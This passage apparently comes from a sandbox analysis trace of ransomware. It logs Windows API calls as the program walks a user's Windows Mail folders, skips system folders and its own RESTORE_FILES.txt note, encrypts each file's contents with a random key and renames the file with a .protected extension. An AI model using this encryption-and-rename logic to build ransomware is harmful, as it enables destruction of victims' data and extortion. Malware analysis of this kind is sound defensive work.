(lpFirst="edbres00002.jrs", lpSrch=".protected") returned 0x0 [0094.396] lstrcmpW (lpString1="edbres00002.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0094.396] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.396] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.397] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.397] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".txt") returned 0x0 [0094.397] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.397] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".rar") returned 0x0 [0094.397] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.397] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".zip") returned 0x0 [0094.397] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.398] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.398] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | 
out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.398] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.398] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.400] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.400] CloseHandle (hObject=0x14c) returned 1 [0094.400] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected") returned 83 [0094.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.protected")) returned 1 [0094.401] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="Windows") returned -1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files") returned -1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="Program Files (x86)") returned -1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="$Recycle.bin") returned 1 [0094.401] lstrcmpiW (lpString1="oeold.xml", lpString2="System Volume Information") returned -1 [0094.401] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.401] StrStrIW (lpFirst="oeold.xml", lpSrch=".protected") returned 0x0 [0094.401] lstrcmpW (lpString1="oeold.xml", lpString2="RESTORE_FILES.txt") returned -1 [0094.401] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.401] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.402] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.402] StrStrW (lpFirst="oeold.xml", lpSrch=".txt") returned 0x0 [0094.402] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.402] StrStrW (lpFirst="oeold.xml", lpSrch=".rar") returned 0x0 [0094.402] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml") returned 67 [0094.402] StrStrW (lpFirst="oeold.xml", lpSrch=".zip") returned 0x0 [0094.402] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0094.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.403] WriteFile (in: hFile=0x14c, 
lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x104, lpOverlapped=0x0) returned 1 [0094.403] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.403] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.403] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.403] CloseHandle (hObject=0x14c) returned 1 [0094.403] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected") returned 77 [0094.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml.protected")) returned 1 [0094.404] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="Windows") returned -1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="Program Files") returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="Program Files (x86)") returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="$Recycle.bin") returned 1 [0094.404] lstrcmpiW (lpString1="Stationery", lpString2="System 
Volume Information") returned -1 [0094.404] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery") returned 68 [0094.404] lstrcmpW (lpString1="Stationery", lpString2=".") returned 1 [0094.404] lstrcmpW (lpString1="Stationery", lpString2="..") returned 1 [0094.405] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*") returned 70 [0094.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.407] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.407] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.407] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.407] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.407] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.407] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.") returned 70 [0094.407] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.407] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.407] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.407] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.407] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.407] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.407] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.407] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.407] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.407] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.407] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.408] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\..") returned 71 [0094.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.408] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.408] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\.." 
(normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.408] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="Windows") returned -1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files") returned -1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="Program Files (x86)") returned -1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="$Recycle.bin") returned 1 [0094.408] lstrcmpiW (lpString1="Bears.htm", lpString2="System Volume Information") returned -1 [0094.408] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.408] StrStrIW (lpFirst="Bears.htm", lpSrch=".protected") returned 0x0 [0094.408] lstrcmpW (lpString1="Bears.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.408] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.409] 
StrStrW (lpFirst="Bears.htm", lpSrch=".txt") returned 0x0 [0094.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.409] StrStrW (lpFirst="Bears.htm", lpSrch=".rar") returned 0x0 [0094.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm") returned 78 [0094.409] StrStrW (lpFirst="Bears.htm", lpSrch=".zip") returned 0x0 [0094.409] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0094.410] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff01, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.410] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xff, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xff, lpOverlapped=0x0) returned 1 [0094.411] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.411] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.411] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.411] CloseHandle (hObject=0x150) returned 1 [0094.411] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected") returned 88 [0094.411] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm.protected")) returned 1 [0094.412] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="Windows") returned -1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files") returned -1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="Program Files (x86)") returned -1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="$Recycle.bin") returned 1 [0094.412] lstrcmpiW (lpString1="Bears.jpg", lpString2="System Volume Information") returned -1 [0094.412] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.412] StrStrIW (lpFirst="Bears.jpg", lpSrch=".protected") returned 0x0 [0094.412] lstrcmpW (lpString1="Bears.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.412] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.412] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.417] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.417] StrStrW (lpFirst="Bears.jpg", lpSrch=".txt") returned 0x0 [0094.417] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.417] StrStrW (lpFirst="Bears.jpg", lpSrch=".rar") returned 0x0 [0094.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 78 [0094.425] StrStrW (lpFirst="Bears.jpg", lpSrch=".zip") returned 0x0 [0094.425] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0094.426] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffbce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.426] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x432, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x432, lpOverlapped=0x0) returned 1 [0094.438] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.438] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.438] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.438] CloseHandle (hObject=0x150) returned 1 [0094.438] wnsprintfW (in: 
pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected") returned 88 [0094.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg.protected")) returned 1 [0094.439] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="Windows") returned -1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files") returned -1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="Program Files (x86)") returned -1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="$Recycle.bin") returned 1 [0094.439] lstrcmpiW (lpString1="Desktop.ini", lpString2="System Volume Information") returned -1 [0094.439] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.439] StrStrIW (lpFirst="Desktop.ini", lpSrch=".protected") returned 0x0 [0094.439] lstrcmpW (lpString1="Desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0094.439] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.439] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows 
Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.439] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.439] StrStrW (lpFirst="Desktop.ini", lpSrch=".txt") returned 0x0 [0094.439] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.440] StrStrW (lpFirst="Desktop.ini", lpSrch=".rar") returned 0x0 [0094.440] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 80 [0094.440] StrStrW (lpFirst="Desktop.ini", lpSrch=".zip") returned 0x0 [0094.440] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0094.441] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.441] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x285, lpOverlapped=0x0) returned 1 [0094.441] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.441] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.441] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.441] CloseHandle (hObject=0x150) returned 1 [0094.441] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected") returned 90 [0094.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.protected")) returned 1 [0094.541] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files") returned -1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files (x86)") returned -1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="$Recycle.bin") returned 1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="System Volume Information") returned -1 [0094.541] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.541] StrStrIW (lpFirst="Garden.htm", lpSrch=".protected") returned 0x0 [0094.541] lstrcmpW (lpString1="Garden.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.541] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
